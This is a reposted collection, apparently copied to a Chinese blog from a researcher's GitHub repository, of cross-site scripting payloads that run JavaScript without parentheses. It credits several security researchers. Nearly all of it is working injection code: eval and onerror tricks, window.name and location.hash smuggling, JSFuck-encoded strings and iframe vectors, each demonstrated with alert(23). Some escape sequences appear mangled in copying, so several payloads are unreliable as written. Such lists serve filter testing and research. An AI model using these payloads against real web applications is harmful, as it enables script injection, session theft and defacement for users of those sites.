• XSS-Payloads


    XSS Without parentheses ()

    This repo contains XSS payloads that doesn't require parentheses, collected from tweets, blogs...

    All the POC's are alert box with number 23


    alert`23`
    

    window.name="javascript:alert(23)";
    location="xss.html";
    

    xss.html

    location=name
    

    Cure53

    eval.call`${'alertx2823x29'}`
    

    Renwa

    eval.apply`${[`alertx2823x29`]}`
    

    Bo0oM

    setTimeout`alertx2823x29`
    setInterval`alertx2823x29`
    

    Garethheyes

    onerror=alert;throw 23;
    

    Garethheyes

    'alertx2823x29'instanceof{[Symbol.hasInstance]:eval}
    

    Only Chrome Garethheyes

    onerror=eval;throw'=alertx2823x29';
    

    Garethheyes

    {onerror=alert}throw 23
    

    Garethheyes

    [][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}+[]][+[]][+!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]}$```//Function(alert(1))
    

    terjanq

    xss_redir.html

    window.name='1;var Uncaught=1;alert(23)';
    location='xss_short.html';
    

    xss_short.html

    {onerror=eval}throw/0/+name
    

    terjanq

    example.com/#1/-alert(23)/
    
    onhashchange=setTimeout;
    Object.prototype.toString=RegExp.prototype.toString;
    Object.prototype.source=location.hash;
    location.hash=null;
    

    terjanq

    throw/a/,Uncaught=1,g=alert,a=g+0,onerror=eval,/1/g+a[14]+[23,331,337]+a[15]
    

    terjanq

    window.name="alert(23)";
    location="xss.html";
    

    xss.html

    Function`a${name}```
    

    terjanq

    Put %0aalert(/23/)// anywhere in the URL

    location='javascript:'+location
    location=/javascript:/.source+location
    location=`javascript:`+location
    

    terjanq

    x={...eval+0,toString:Array.prototype.shift,length:15},
    x+x+x+x+x+x+x+x+x+x+x+x+x,
    location = /javascript:/.source + alert.name+x+23+x
    

    terjanq

    example.com/xss?%0aalert(/23/)//
    
    
    Function`a${unescape. call`${location}`}```
    

    aemkei

    onhashchange=setTimeout;
    HashChangeEvent.prototype.toString=
    RegExp.prototype.toString;
    location.hash=
    HashChangeEvent.prototype.source=
    '1/-alert502351/';
    

    aemkei

    onload=setTimeout
    Event.prototype.toString=
    _=>"alert502351"
    

    aemkei

    throw/**/Uncaught=window.onerror=eval,";alert502351"
    

    Gareth Heyes

    x=new DOMMatrix;
    matrix=alert;
    x.a=23;
    location='javascript'+':'+x
    

    BitK

    Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}23${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}```
    

    BitK

    range = document.createRange``; 
    range.createContextualFragment`<img src=x onerror=alertx2823x29>'`;
    

    BitK

    Function`a${`${Function`a${`return from`}{from}``${Array}``96${Function`a${`return fromCharCode`}{fromCharCode}``${String}`}`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``${96}${10}${97}${108}${101}${114}${116}${40}${50}${51}${41}`}`}```
    

    albinowax

    window.name="alert(23)"
    location="xss.html"
    

    xss.html

    eval.constructor`evalx28namex29```
    

    hasegawayosuke

    window.name="alert(23)"
    location="xss.html"
    

    xss.html

    [].every.call`evalx28namex29${eval}`
    

    Tomer Zait

    []["filter"]["constructor"]`alertx2823x29```
    

    Pepe Vila

    Array.prototype[Symbol.hasInstance]=eval;
    "alertx2823x29" instanceof [];
    

    RootEval

    x='javascript:alertx2823x29';x={x:location}=this
    

    iwasakinoriaki

    window.name="alert(23)"
    location="xss.html"
    

    xss.html

    eval.call`${top.name}`
    

    Cure53

    window.name="<img src=x onerror=alert(23)>"
    location="xss.html"
    

    xss.html

    document.write`${top.name}`
    

    mage_1868

    location="https://example.com/xss.html/.source;alert(23)?xss="
    

    example.com

    eval.call`${location.pathname}`
    

    Only Firefox Garethheyes

    {onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alertx2823x29'}
    

    ycam

    example.com/xss#*/;alert(23);
    
    throw/**/onerror=Uncaught=eval,e={lineNumber:1,columnNumber:1,fileName:'',message:'/*'+location.hash},typeof/**/InstallTrigger!='undefined'?e:e.message
    

    cgvwzq

    https://demo.vwzq.net/lol.html

    <script/id=Uncaught>
    
    // chrome + firefox
    
    throw[onerror=eval][e=[x='+alertx2823x29']]=0[e.lineNumber=e.columnNumber=e.fileName=e.message=x]=e
    
    </script>
    
    <script>
    
    // firefox
    
    onhashchange=setTimeout,HashChangeEvent.prototype[Symbol.toStringTag]='+alertx2823x29',location.hash=1
    
    </script>
    
    <script>
    
    // chrome + firefox
    
    Array.prototype[Symbol.hasInstance]=eval,'alertx2823x29'instanceof[]
    
    </script>
    
    <script>
    
    // chrome
    
    [onerror=eval][TypeError.prototype.name='=/']['/-alertx2823x29//']
    
    </script>
    
    
    <script>
    
    // chrome
    
    onerror=eval,ReferenceError.prototype.name='=alertx2823x29//',lol
    
    </script>
    

    Renwa

    document.body.innerHTML="u003cimg src=x onerror=alertu002823u0029u003e";
    

    Renwa

    document.body.innerHTML="&ltimg src=x onerror=alert&lpar;23&rpar;&gt"
    document.body.innerHTML=document.body.innerText
    

    If the page is frameable Renwa

    data:text/html,<iframe name="<svg/onload=alert(23)>" src="http://example.com/xss?document.body.innerHTML=name">
    

    user00239123

    document.location='javascript:alert%2823%29'
    

    Only IE matt

    example.com/xss#<img src=x onerror=alert(23)>
    
    document.body.innerHTML=location.hash;
    

    Brutelogic

    <svg/onload='alert&#40 23 &#41'> 
    

    Blakils

    location=/javascript:alert%2823%29/.source;
    

    Nicocanicolas

    http://example.com/?test=&lt;img/src=&quot;x&quot;/onerror=alert(23)&gt;
    
    document.body.innerHTML=location.search;
    document.body.innerHTML=document.body.innerText;
    


    Anything: @RenwaX23

    来源:
    https://github.com/RenwaX23/XSS-Payloads/edit/master/Without-Parentheses.md

    逆水行舟,不进则退。
  • 相关阅读:
    C#添加修改删除文件文件夹大全
    实用且不花哨的js代码大全
    vs2005 2008快捷键
    C#:String.Format数字格式化输出
    获取农历日期
    Vim 常用快捷键
    一个简单的makefile示例及其注释
    nginx源码剖析(1)概要
    利用Vim 打造开发环境(一)>Linux 字符界面 vim的配置
    Ubuntu 9.10设置摘要
  • 原文地址:https://www.cnblogs.com/rab3it/p/14623992.html
Copyright © 2020-2023  润新知